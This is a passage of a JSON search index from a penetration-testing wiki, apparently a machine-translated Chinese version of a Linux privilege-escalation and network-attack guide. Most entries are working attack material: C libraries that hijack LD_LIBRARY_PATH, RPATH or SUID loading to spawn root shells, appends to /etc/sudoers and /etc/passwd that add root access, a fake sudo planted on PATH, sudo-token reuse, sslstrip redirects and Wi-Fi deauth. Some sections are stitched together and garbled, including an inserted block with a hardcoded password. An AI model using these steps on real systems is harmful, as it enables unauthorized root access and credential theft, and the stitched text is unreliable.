LD_LIBRARY_PATH 环境变量,则可以滥用类似的 privesc,因为攻击者控制了库将被搜索的路径。 c #include \\n#include static void hijack() __attribute__((constructor)); void hijack() {\\nunsetenv(\\"LD_LIBRARY_PATH\\");\\nsetresuid(0,0,0);\\nsystem(\\"/bin/bash -p\\");\\n} bash # Compile & execute\\ncd /tmp\\ngcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c\\nsudo LD_LIBRARY_PATH=/tmp ","breadcrumbs":"Linux Privilege Escalation » LD_PRELOAD & LD_LIBRARY_PATH","id":"1439","title":"LD_PRELOAD & LD_LIBRARY_PATH"},"144":{"body":"基本上,这个攻击的作用是,如果 user 试图 access 一个 HTTP 页面并被 redirecting 到 HTTPS 版本, sslStrip 会 maintain 一个 HTTP connection with 该 client and 一个 HTTPS connection with 该 server ,因此它将能够 sniff 该连接的 plain text 。 bash apt-get install sslstrip\\nsslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k\\n#iptables --flush\\n#iptables --flush -t nat\\niptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000\\niptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT 更多信息 here .","breadcrumbs":"Pentesting Network » sslStrip","id":"144","title":"sslStrip"},"1440":{"body":"当遇到具有 SUID 权限且看起来不寻常的二进制文件时,最好确认它是否正确加载 .so 文件。可以通过运行以下命令来检查: bash strace 2>&1 | grep -i -E \\"open|access|no such file\\" 例如,遇到类似错误 \\"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)\\" 表明可能存在 exploitation 的可能性。 要 exploit 这个,可通过创建一个 C 文件,例如 \\"/path/to/.config/libcalc.c\\" , 并包含以下代码: c #include \\n#include static void inject() __attribute__((constructor)); void inject(){\\nsystem(\\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p\\");\\n} 这段代码在编译并执行后,旨在通过修改文件权限并执行具有提升权限的 shell 来提升权限。 使用以下命令将上面的 C 文件编译为 shared object (.so) 文件: bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c 最后,运行受影响的 SUID 二进制文件应触发该 exploit,从而可能导致系统遭到妥协。","breadcrumbs":"Linux Privilege Escalation » SUID Binary – .so injection","id":"1440","title":"SUID Binary – .so injection"},"1441":{"body":"bash # Lets find a SUID using a non-standard library\\nldd some_suid\\nsomething.so => /lib/x86_64-linux-gnu/something.so # The SUID also loads libraries from a custom location where we can write\\nreadelf -d payroll | grep PATH\\n0x000000000000001d (RUNPATH) Library runpath: [/development] 既然我们已经找到一个会从我们可写的文件夹加载 library 的 SUID binary,就在该文件夹中以所需的名称创建该 library: c //gcc src.c -fPIC -shared -o /development/libshared.so\\n#include \\n#include static void hijack() __attribute__((constructor)); void hijack() {\\nsetresuid(0,0,0);\\nsystem(\\"/bin/bash -p\\");\\n} 如果你遇到类似如下的错误: shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name 这意味着你生成的库需要包含一个名为 a_function_name 的函数。","breadcrumbs":"Linux Privilege Escalation » Shared Object Hijacking","id":"1441","title":"Shared Object Hijacking"},"1442":{"body":"GTFOBins 是一个精选的 Unix 二进制可执行文件列表,这些文件可能被攻击者利用以绕过本地安全限制。 GTFOArgs 针对只能在命令中 注入参数 的情况提供了类似的列表。 该项目收集了 Unix 二进制程序的合法功能,这些功能可能被滥用来逃离受限 shell、提升或保持提升的权限、传输文件、生成 bind 和 reverse shell,以及辅助其它 post-exploitation 任务。 gdb -nx -ex \'!sh\' -ex quit sudo mysql -e \'! /bin/sh\' strace -o /dev/null /bin/sh sudo awk \'BEGIN {system(\\"/bin/sh\\")}\' \\\\n \\\\n GTFOBins\\\\n \\\\n \\\\n GTFOArgs\\\\n","breadcrumbs":"Linux Privilege Escalation » GTFOBins","id":"1442","title":"GTFOBins"},"1443":{"body":"如果你可以访问 sudo -l,可以使用工具 FallOfSudo 来检查它是否能找到利用任何 sudo 规则的方法。","breadcrumbs":"Linux Privilege Escalation » FallOfSudo","id":"1443","title":"FallOfSudo"},"1444":{"body":"在拥有 sudo access 但没有密码的情况下,你可以通过 等待某次 sudo 命令执行然后劫持会话令牌 来提升权限。 Requirements to escalate privileges: 你已经有一个以用户 sampleuser 身份的 shell sampleuser 已 使用 sudo 在 最近 15 分钟 内执行过某些命令(默认这是 sudo 令牌允许我们在不输入密码的情况下使用 sudo 的持续时间) cat /proc/sys/kernel/yama/ptrace_scope 的输出为 0 gdb 可用(你可以上传它) (你可以临时使用 echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope 来启用 ptrace_scope,或通过永久修改 /etc/sysctl.d/10-ptrace.conf 并设置 kernel.yama.ptrace_scope = 0 来实现) If all these requirements are met, you can escalate privileges using: https://github.com/nongiach/sudo_inject 第一个 exploit (exploit.sh) 会在 /tmp 创建名为 activate_sudo_token 的二进制文件。你可以用它来 在你的会话中激活 sudo 令牌 (它不会自动给你 root shell,需执行 sudo su): bash bash exploit.sh\\n/tmp/activate_sudo_token\\nsudo su 第二个 exploit (exploit_v2.sh) 会在 /tmp 创建一个 sh shell, 归 root 所有并带有 setuid bash bash exploit_v2.sh\\n/tmp/sh -p 第三个 exploit (exploit_v3.sh) 会 create a sudoers file ,使 sudo tokens eternal and allows all users to use sudo bash bash exploit_v3.sh\\nsudo su","breadcrumbs":"Linux Privilege Escalation » Reusing Sudo Tokens","id":"1444","title":"Reusing Sudo Tokens"},"1445":{"body":"如果你对该文件夹或其下创建的任意文件具有 写权限 ,你可以使用二进制工具 write_sudo_token 来 为某个用户和 PID 创建 sudo token 。 例如,如果你能覆盖文件 /var/run/sudo/ts/sampleuser ,并且以该用户身份拥有 PID 为 1234 的 shell,你可以在不需要知道密码的情况下通过以下方式 获得 sudo privileges : bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser","breadcrumbs":"Linux Privilege Escalation » /var/run/sudo/ts/","id":"1445","title":"/var/run/sudo/ts/"},"1446":{"body":"文件 /etc/sudoers 及 /etc/sudoers.d 内的文件用来配置谁可以使用 sudo 以及如何使用。 这些文件 默认情况下只能由用户 root 和组 root 读取 。 如果 你 可以读取 该文件,可能能够 获取一些有趣的信息 ,而如果你 可以写入 任何文件,你将能够 提升权限 。 bash ls -l /etc/sudoers /etc/sudoers.d/\\nls -ld /etc/sudoers.d/ 如果你可以写入,你就可以滥用此权限 bash echo \\"$(whoami) ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers\\necho \\"$(whoami) ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers.d/README 滥用这些权限的另一种方式: bash # makes it so every terminal can sudo\\necho \\"Defaults !tty_tickets\\" > /etc/sudoers.d/win\\n# makes it so sudo never times out\\necho \\"Defaults timestamp_timeout=-1\\" >> /etc/sudoers.d/win","breadcrumbs":"Linux Privilege Escalation » /etc/sudoers, /etc/sudoers.d","id":"1446","title":"/etc/sudoers, /etc/sudoers.d"},"1447":{"body":"有一些替代 sudo 的选项,例如 OpenBSD 的 doas,请记得检查其配置 /etc/doas.conf。 permit nopass demo as root cmd vim","breadcrumbs":"Linux Privilege Escalation » DOAS","id":"1447","title":"DOAS"},"1448":{"body":"如果你知道某个 用户通常连接到一台机器并使用 sudo 来提升权限,且你已在该用户上下文中获得了一个 shell,你可以 创建一个新的 sudo 可执行文件 ,该文件会先以 root 身份执行你的代码,然后再执行用户的命令。然后, 修改该用户上下文的 $PATH (例如在 .bash_profile 中添加新路径),这样当用户执行 sudo 时,就会运行你创建的 sudo 可执行文件。 请注意,如果用户使用不同的 shell(不是 bash),你需要修改其他文件来添加新路径。例如 sudo-piggyback 会修改 ~/.bashrc, ~/.zshrc, ~/.bash_profile。你可以在 bashdoor.py 中找到另一个示例。 或者运行类似如下的命令: bash cat >/tmp/sudo < /tmp/privesc\\n/usr/bin/sudo \\"\\\\$@\\"\\nEOF\\nchmod +x /tmp/sudo\\necho ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv # or \\".bashrc\\" or any other # From the victim\\nzsh\\necho $PATH\\nsudo ls","breadcrumbs":"Linux Privilege Escalation » Sudo Hijacking","id":"1448","title":"Sudo Hijacking"},"1449":{"body":"","breadcrumbs":"Linux Privilege Escalation » 共享库","id":"1449","title":"共享库"},"145":{"body":"与 sslStrip 相比, sslStrip+ and dns2proxy 的 区别 在于它们会 重定向 例如 www.facebook.com 到 wwww.facebook.com (注意 额外 的“ w ”)并将 该域名的地址设为攻击者 IP 。这样, 客户端 会 连接 到 wwww.facebook.com (攻击者),但在幕后,**sslstrip+**会通过 https 与 www.facebook.com 维护 真实的连接。 该技术的 目标 是 绕过 HSTS ,因为 wwww .facebook.com 不会 被保存在浏览器的 缓存 中,因此浏览器会被欺骗以通过 HTTP 执行 facebook 身份验证 。 注意,为执行此攻击,受害者必须最初尝试访问 http://www.faceook.com 而不是 https。这可以通过修改 http 页面内的链接来完成。 更多信息 here , here 和 here . sslStrip or sslStrip+ 不再可行。原因是浏览器中预存了 HSTS 规则,所以即使用户第一次访问一个“重要”域,他也会通过 HTTPS 访问。此外,请注意预存规则和其他生成的规则可以使用标志 includeSubdomains 因此之前的 wwww.facebook.com 示例将不再有效,因为 facebook.com 使用带有 includeSubdomains 的 HSTS。 TODO: easy-creds, evilgrade, metasploit, factory","breadcrumbs":"Pentesting Network » sslStrip+ and dns2proxy 用于绕过 HSTS","id":"145","title":"sslStrip+ and dns2proxy 用于绕过 HSTS"},"1450":{"body":"The file /etc/ld.so.conf indicates where the loaded configurations files are from . Typically, this file contains the following path: include /etc/ld.so.conf.d/*.conf That means that the configuration files from /etc/ld.so.conf.d/*.conf will be read. This configuration files points to other folders where libraries are going to be searched for. For example, the content of /etc/ld.so.conf.d/libc.conf is /usr/local/lib. This means that the system will search for libraries inside /usr/local/lib . If for some reason a user has write permissions on any of the paths indicated: /etc/ld.so.conf, /etc/ld.so.conf.d/, any file inside /etc/ld.so.conf.d/ or any folder within the config file inside /etc/ld.so.conf.d/*.conf he may be able to escalate privileges. Take a look at how to exploit this misconfiguration in the following page: ld.so privesc exploit example","breadcrumbs":"Linux Privilege Escalation » ld.so","id":"1450","title":"ld.so"},"1451":{"body":"level15@nebula:/home/flag15$ readelf -d flag15 | egrep \\"NEEDED|RPATH\\"\\n0x00000001 (NEEDED) Shared library: [libc.so.6]\\n0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] level15@nebula:/home/flag15$ ldd ./flag15\\nlinux-gate.so.1 => (0x0068c000)\\nlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)\\n/lib/ld-linux.so.2 (0x005bb000) 通过将 lib 复制到 /var/tmp/flag15/,程序会在此处按照 RPATH 变量的指定使用它。 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ level15@nebula:/home/flag15$ ldd ./flag15\\nlinux-gate.so.1 => (0x005b0000)\\nlibc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)\\n/lib/ld-linux.so.2 (0x00737000) 然后在 /var/tmp 创建一个恶意库,使用 gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6 c #include\\n#define SHELL \\"/bin/sh\\" int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))\\n{\\nchar *file = SHELL;\\nchar *argv[] = {SHELL,0};\\nsetresuid(geteuid(),geteuid(), geteuid());\\nexecve(file,argv,0);\\n}","breadcrumbs":"Linux Privilege Escalation » RPATH","id":"1451","title":"RPATH"},"1452":{"body":"Linux capabilities 为进程提供了 root 特权的一个可用子集 。这有效地将 root 的 特权分解为更小且更独立的单元 。这些单元中的每一个都可以独立授予给进程。这样就减少了完整权限集,从而降低了被利用的风险。 阅读以下页面以 了解有关 capabilities 以及如何滥用它们的更多信息 : Linux Capabilities","breadcrumbs":"Linux Privilege Escalation » 能力","id":"1452","title":"能力"},"1453":{"body":"在目录中, \\"execute\\" 位 表示受影响的用户可以 \\"cd\\" 进入该文件夹。 \\"read\\" 位 表示用户可以 列出 这些 文件 ,而 \\"write\\" 位 表示用户可以 删除 和 创建 新的 文件 。","breadcrumbs":"Linux Privilege Escalation » 目录权限","id":"1453","title":"目录权限"},"1454":{"body":"访问控制列表 (ACLs) 表示可自由裁量权限的二级层,能够 覆盖传统的 ugo/rwx 权限 。这些权限通过允许或拒绝非所有者或不在组内的特定用户的访问权来增强对文件或目录访问的控制。此级别的 粒度确保更精确的访问管理 。更多细节请见 here 。 授予 用户 \\"kali\\" 对某个文件的 read 和 write 权限: bash setfacl -m u:kali:rw file.txt\\n#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file 获取 从系统中带有特定 ACLs 的文件: bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » ACLs","id":"1454","title":"ACLs"},"1455":{"body":"在 旧版本 中你可能可以 hijack 某个不同用户( root )的 shell 会话。 在 最新版本 中你只能 连接 到仅属于 你自己的用户 的 screen sessions。不过,你可能会在会话内部发现 会话内部的有趣信息 。","breadcrumbs":"Linux Privilege Escalation » 打开 shell 会话","id":"1455","title":"打开 shell 会话"},"1456":{"body":"列出 screen sessions bash screen -ls\\nscreen -ls / # Show another user\' screen sessions 附加到会话 bash screen -dr #The -d is to detach whoever is attached to it\\nscreen -dr 3350.foo #In the example of the image\\nscreen -x [user]/[session id]","breadcrumbs":"Linux Privilege Escalation » screen sessions hijacking","id":"1456","title":"screen sessions hijacking"},"1457":{"body":"这是一个出现在 old tmux versions 的问题。作为非特权用户,我无法劫持由 root 创建的 tmux (v2.1) 会话。 列出 tmux 会话 bash tmux ls\\nps aux | grep tmux #Search for tmux consoles not using default folder for sockets\\ntmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess 连接到 session bash tmux attach -t myname #If you write something in this session it will appears in the other opened one\\ntmux attach -d -t myname #First detach the session from the other console and then access it yourself ls -la /tmp/dev_sess #Check who can access it\\nrw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs can\\n# If you are root or devs you can access it\\ntmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket Check Valentine box from HTB for an example.","breadcrumbs":"Linux Privilege Escalation » tmux sessions hijacking","id":"1457","title":"tmux sessions hijacking"},"1458":{"body":"","breadcrumbs":"Linux Privilege Escalation » SSH","id":"1458","title":"SSH"},"1459":{"body":"在 2006 年 9 月至 2008 年 5 月 13 日之间,在基于 Debian 的系统(Ubuntu、Kubuntu 等)上生成的所有 SSL 和 SSH 密钥可能受到此漏洞影响。 该漏洞在这些操作系统上创建新的 ssh 密钥时产生, 只有 32,768 种变体可用 。这意味着所有可能性都可以被计算出来, 得到 ssh 公钥后即可搜索对应的私钥 。你可以在这里找到计算出的可能性: https://github.com/g0tmi1k/debian-ssh","breadcrumbs":"Linux Privilege Escalation » Debian OpenSSL Predictable PRNG - CVE-2008-0166","id":"1459","title":"Debian OpenSSL Predictable PRNG - CVE-2008-0166"},"146":{"body":"bash sudo nc -l -p 80\\nsocat TCP4-LISTEN:80,fork,reuseaddr -","breadcrumbs":"Pentesting Network » TCP 监听端口","id":"146","title":"TCP 监听端口"},"1460":{"body":"PasswordAuthentication: 指定是否允许密码认证。默认是 no。 PubkeyAuthentication: 指定是否允许公钥认证。默认是 yes。 PermitEmptyPasswords : 当允许密码认证时,指定服务器是否允许使用空密码字符串登录账户。默认是 no。","breadcrumbs":"Linux Privilege Escalation » SSH Interesting configuration values","id":"1460","title":"SSH Interesting configuration values"},"1461":{"body":"指定是否允许 root 使用 ssh 登录,默认是 no。可能的取值: yes: root 可使用密码和私钥登录 without-password or prohibit-password: root 只能使用私钥登录 forced-commands-only: root 仅能使用私钥登录,且要求指定命令选项 no:不允许","breadcrumbs":"Linux Privilege Escalation » PermitRootLogin","id":"1461","title":"PermitRootLogin"},"1462":{"body":"指定包含可用于用户认证的公钥的文件。它可以包含像 %h 这样的标记,%h 会被替换为主目录。 你可以指定绝对路径 (以 / 开头)或 相对于用户主目录的相对路径 。例如: bash AuthorizedKeysFile .ssh/authorized_keys access That configuration will indicate that if you try to login with the private key of the user \\" testusername \\" ssh is going to compare the public key of your key with the ones located in /home/testusername/.ssh/authorized_keys and /home/testusername/access","breadcrumbs":"Linux Privilege Escalation » AuthorizedKeysFile","id":"1462","title":"AuthorizedKeysFile"},"1463":{"body":"SSH agent forwarding 允许你 use your local SSH keys instead of leaving keys (不要把没有 passphrases 的 keys 放在你的服务器上)。因此,你可以通过 ssh jump to a host ,然后从那里 jump to another host, using 存放在你 initial host 上的 key 。 You need to set this option in $HOME/.ssh.config like this: Host example.com\\nForwardAgent yes 注意,如果 Host 是 *,每次用户跳转到不同的机器时,该主机都将能够访问密钥(这是一个安全问题)。 文件 /etc/ssh_config 可以 覆盖 这些 选项 并允许或拒绝此配置。 文件 /etc/sshd_config 可以使用关键字 AllowAgentForwarding 允许 或 拒绝 ssh-agent 转发(默认允许)。 如果你发现环境中配置了 Forward Agent,请阅读以下页面,因为 你可能能够滥用它以提升权限 : SSH Forward Agent exploitation","breadcrumbs":"Linux Privilege Escalation » ForwardAgent/AllowAgentForwarding","id":"1463","title":"ForwardAgent/AllowAgentForwarding"},"1464":{"body":"","breadcrumbs":"Linux Privilege Escalation » 有趣的文件","id":"1464","title":"有趣的文件"},"1465":{"body":"文件 /etc/profile 和 /etc/profile.d/ 下的文件是 当用户运行新 shell 时执行的脚本 。因此,如果你可以 写入或修改其中的任何一个,就可以提升权限 。 bash ls -l /etc/profile /etc/profile.d/ 如果发现任何异常的 profile 脚本,应检查其中是否包含 敏感信息 。","breadcrumbs":"Linux Privilege Escalation » Profiles 文件","id":"1465","title":"Profiles 文件"},"1466":{"body":"根据操作系统,/etc/passwd 和 /etc/shadow 文件可能使用不同的名称,或存在备份。因此建议 查找所有此类文件 并 检查是否可读取 ,以查看文件中 是否包含哈希 : bash #Passwd equivalent files\\ncat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null\\n#Shadow equivalent files\\ncat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null 在某些情况下,你可以在 /etc/passwd(或等效)文件中找到 password hashes bash grep -v \'^[^:]*:[x\\\\*]\' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Passwd/Shadow 文件","id":"1466","title":"Passwd/Shadow 文件"},"1467":{"body":"首先,使用以下任一命令生成一个 password。 openssl passwd -1 -salt hacker hacker\\nmkpasswd -m SHA-512 hacker\\npython2 -c \'import crypt; print crypt.crypt(\\"hacker\\", \\"$6$salt\\")\'","breadcrumbs":"Linux Privilege Escalation » 可写的 /etc/passwd","id":"1467","title":"可写的 /etc/passwd"},"1468":{"body":"本节介绍在 Linux 系统中进行 Privilege Escalation 的常见方法、枚举技巧和防御建议。仅在获得授权的 pentesting、红队或审计环境中使用这些技术。","breadcrumbs":"Linux Privilege Escalation » Privilege Escalation","id":"1468","title":"Privilege Escalation"},"1469":{"body":"从基础做起:检查 kernel 版本、内核漏洞、已加载的模块、内核配置以及 dmesg 输出。 用户和权限:查看 /etc/passwd、/etc/shadow(若可读)、sudoers、组信息以及 home 目录权限。 服务和进程:枚举正在运行的服务、crontab、systemd 单元以及具有高权限的进程句柄。 文件和二进制:查找 SUID/SGID 文件、可写的脚本或配置文件、可利用的 PATH 问题。 Capability 与 namespaces:检查 file capabilities、setcap 输出以及不安全的 namespace 配置。 第三方工具与资源:使用 LinPEAS、GTFOBins、sudo -l 等工具和技巧来加速枚举过程。","breadcrumbs":"Linux Privilege Escalation » 常见枚举步骤","id":"1469","title":"常见枚举步骤"},"147":{"body":"生成密钥和自签名证书 FILENAME=server\\n# Generate a public/private key pair:\\nopenssl genrsa -out $FILENAME.key 1024\\n# Generate a self signed certificate:\\nopenssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt\\n# Generate the PEM file by just appending the key and certificate files:\\ncat $FILENAME.key $FILENAME.crt >$FILENAME.pem 使用证书进行监听 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 - 使用证书监听并重定向到主机 sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 openssl-connect:[SERVER]:[PORT],verify=0 有时,如果客户端检查 CA 是否为有效的,你可以 serve a certificate of other hostname signed by a CA . 另一个有趣的测试,是提供一个 c ertificate of the requested hostname but self-signed 。 其他要测试的情况包括尝试用一个虽然是 valid certificate 但并非有效 CA 的 certificate 来签名。或者使用有效的 public key,强制使用像 diffie hellman 这样的算法(这种算法不需要用真实的 private key 去解密任何东西),当客户端请求对真实 private key 的 probe(比如 hash)时,发送一个假的 probe,并期望客户端不会去检查它。","breadcrumbs":"Pentesting Network » TCP + SSL 在端口上监听","id":"147","title":"TCP + SSL 在端口上监听"},"1470":{"body":"SUID/SGID 可执行文件滥用(SUID) 错误配置的 sudo 权限(sudo) 可写的 cron 脚本或 systemd 单元 易受攻击的服务或守护进程(如使用高权限运行) 可利用的 kernel exploits(仅在受控环境下测试) 凭证泄露(如配置文件或历史记录中的明文密码或 SSH 密钥)","breadcrumbs":"Linux Privilege Escalation » 常见漏洞类别(示例)","id":"1470","title":"常见漏洞类别(示例)"},"1471":{"body":"及时打补丁并更新内核与关键组件。 最小权限原则:限制 sudoers 和服务运行权限。 移除不必要的 SUID 二进制并最小化 setcap 的使用。 加强日志和审计,检测异常的提权行为和命令执行。 对关键目录和配置文件设置严格的权限控制并加密敏感凭证。","breadcrumbs":"Linux Privilege Escalation » 防御建议","id":"1471","title":"防御建议"},"1472":{"body":"下面的示例在系统上创建用户 hacker 并设置一个随机生成的强口令。请在授权的环境中运行这些命令。 sudo useradd -m -s /bin/bash hacker\\necho \'hacker:S3cure!8kLm#V2qR\' | sudo chpasswd\\nsudo chage -d 0 hacker 生成的密码(请妥善保存并在需要时更改): S3cure!8kLm#V2qR hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash 例如: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash 你现在可以使用 su 命令并使用 hacker:hacker 或者,你可以使用以下行添加一个没有密码的虚拟用户。 警告:这可能会降低机器当前的安全性。 echo \'dummy::0:0::/root:/bin/bash\' >>/etc/passwd\\nsu - dummy 注意:在 BSD 平台上 /etc/passwd 位于 /etc/pwd.db 和 /etc/master.passwd,同时 /etc/shadow 被重命名为 /etc/spwd.db。 你应该检查是否可以 写入一些敏感文件 。例如,你能否写入某些 服务配置文件 ? bash find / \'(\' -type f -or -type d \')\' \'(\' \'(\' -user $USER \')\' -or \'(\' -perm -o=w \')\' \')\' 2>/dev/null | grep -v \'/proc/\' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody\\nfor g in `groups`; do find \\\\( -type f -or -type d \\\\) -group $g -perm -g=w 2>/dev/null | grep -v \'/proc/\' | grep -v $HOME; done #Find files writable by any group of the user 例如,如果机器正在运行 tomcat 服务器,并且你可以 modify the Tomcat service configuration file inside /etc/systemd/, 那么你可以修改以下几行: ExecStart=/path/to/backdoor\\nUser=root\\nGroup=root 你的 backdoor 将在下次 tomcat 启动时被执行。","breadcrumbs":"Linux Privilege Escalation » 添加用户 hacker 并设置生成的密码","id":"1472","title":"添加用户 hacker 并设置生成的密码"},"1473":{"body":"以下文件夹可能包含备份或有趣的信息: /tmp , /var/tmp , /var/backups, /var/mail, /var/spool/mail, /etc/exports, /root (最后一个可能无法读取,但试试看) bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root","breadcrumbs":"Linux Privilege Escalation » 检查文件夹","id":"1473","title":"检查文件夹"},"1474":{"body":"bash #root owned files in /home folders\\nfind /home -user root 2>/dev/null\\n#Files owned by other users in folders owned by me\\nfor d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \\\\; 2>/dev/null; done\\n#Files owned by root, readable by me but not world readable\\nfind / -type f -user root ! -perm -o=r 2>/dev/null\\n#Files owned by me or world writable\\nfind / \'(\' -type f -or -type d \')\' \'(\' \'(\' -user $USER \')\' -or \'(\' -perm -o=w \')\' \')\' ! -path \\"/proc/*\\" ! -path \\"/sys/*\\" ! -path \\"$HOME/*\\" 2>/dev/null\\n#Writable files by each group I belong to\\nfor g in `groups`;\\ndo printf \\" Group $g:\\\\n\\";\\nfind / \'(\' -type f -or -type d \')\' -group $g -perm -g=w ! -path \\"/proc/*\\" ! -path \\"/sys/*\\" ! -path \\"$HOME/*\\" 2>/dev/null\\ndone\\ndone","breadcrumbs":"Linux Privilege Escalation » 奇怪的位置/Owned 文件","id":"1474","title":"奇怪的位置/Owned 文件"},"1475":{"body":"bash find / -type f -mmin -5 ! -path \\"/proc/*\\" ! -path \\"/sys/*\\" ! -path \\"/run/*\\" ! -path \\"/dev/*\\" ! -path \\"/var/lib/*\\" 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 最近几分钟修改的文件","id":"1475","title":"最近几分钟修改的文件"},"1476":{"body":"bash find / -name \'*.db\' -o -name \'*.sqlite\' -o -name \'*.sqlite3\' 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Sqlite 数据库文件","id":"1476","title":"Sqlite 数据库文件"},"1477":{"body":"bash find / -type f \\\\( -name \\"*_history\\" -o -name \\".sudo_as_admin_successful\\" -o -name \\".profile\\" -o -name \\"*bashrc\\" -o -name \\"httpd.conf\\" -o -name \\"*.plan\\" -o -name \\".htpasswd\\" -o -name \\".git-credentials\\" -o -name \\"*.rhosts\\" -o -name \\"hosts.equiv\\" -o -name \\"Dockerfile\\" -o -name \\"docker-compose.yml\\" \\\\) 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml 文件","id":"1477","title":"*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml 文件"},"1478":{"body":"bash find / -type f -iname \\".*\\" -ls 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 隐藏文件","id":"1478","title":"隐藏文件"},"1479":{"body":"bash for d in `echo $PATH | tr \\":\\" \\"\\\\n\\"`; do find $d -name \\"*.sh\\" 2>/dev/null; done\\nfor d in `echo $PATH | tr \\":\\" \\"\\\\n\\"`; do find $d -type f -executable 2>/dev/null; done","breadcrumbs":"Linux Privilege Escalation » PATH 中的脚本/二进制文件","id":"1479","title":"PATH 中的脚本/二进制文件"},"148":{"body":"bash # Events\\nevents.stream off #Stop showing events\\nevents.show #Show all events\\nevents.show 5 #Show latests 5 events\\nevents.clear # Ticker (loop of commands)\\nset ticker.period 5; set ticker.commands \\"wifi.deauth DE:AD:BE:EF:DE:AD\\"; ticker on # Caplets\\ncaplets.show\\ncaplets.update # Wifi\\nwifi.recon on\\nwifi.deauth BSSID\\nwifi.show\\n# Fake wifi\\nset wifi.ap.ssid Banana\\nset wifi.ap.bssid DE:AD:BE:EF:DE:AD\\nset wifi.ap.channel 5\\nset wifi.ap.encryption false #If true, WPA2\\nwifi.recon on; wifi.ap","breadcrumbs":"Pentesting Network » Bettercap","id":"148","title":"Bettercap"},"1480":{"body":"bash ls -alhR /var/www/ 2>/dev/null\\nls -alhR /srv/www/htdocs/ 2>/dev/null\\nls -alhR /usr/local/www/apache22/data/\\nls -alhR /opt/lampp/htdocs/ 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » Web 文件","id":"1480","title":"Web 文件"},"1481":{"body":"bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \\\\( -name \\"*backup*\\" -o -name \\"*\\\\.bak\\" -o -name \\"*\\\\.bck\\" -o -name \\"*\\\\.bk\\" \\\\) 2>/dev/null","breadcrumbs":"Linux Privilege Escalation » 备份","id":"1481","title":"备份"},"1482":{"body":"阅读 linPEAS 的代码,它会搜索 可能包含密码的若干文件 。 另一个有趣的工具 是: LaZagne ,它是一个开源程序,用来检索存储在本地计算机上的大量密码,适用于 Windows, Linux & Mac.","breadcrumbs":"Linux Privilege Escalation » 已知包含密码的文件","id":"1482","title":"已知包含密码的文件"},"1483":{"body":"如果你能够读取日志,你可能会在其中发现 有趣/机密的信息 。日志越异常,可能就越有价值(大概)。 此外,一些“ 不当 ”配置(带后门?)的 审计日志 可能允许你在审计日志中 记录密码 ,正如这篇文章所解释的: https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/ . bash aureport --tty | grep -E \\"su |sudo \\" | sed -E \\"s,su|sudo,${C}[1;31m&${C}[0m,g\\"\\ngrep -RE \'comm=\\"su\\"|comm=\\"sudo\\"\' /var/log* 2>/dev/null 为了 读取日志的组 adm 会非常有帮助。","breadcrumbs":"Linux Privilege Escalation » 日志","id":"1483","title":"日志"},"1484":{"body":"bash ~/.bash_profile # if it exists, read it once when you log in to the shell\\n~/.bash_login # if it exists, read it once if .bash_profile doesn\'t exist\\n~/.profile # if it exists, read once if the two above don\'t exist\\n/etc/profile # only read if none of the above exists\\n~/.bashrc # if it exists, read it every time you start 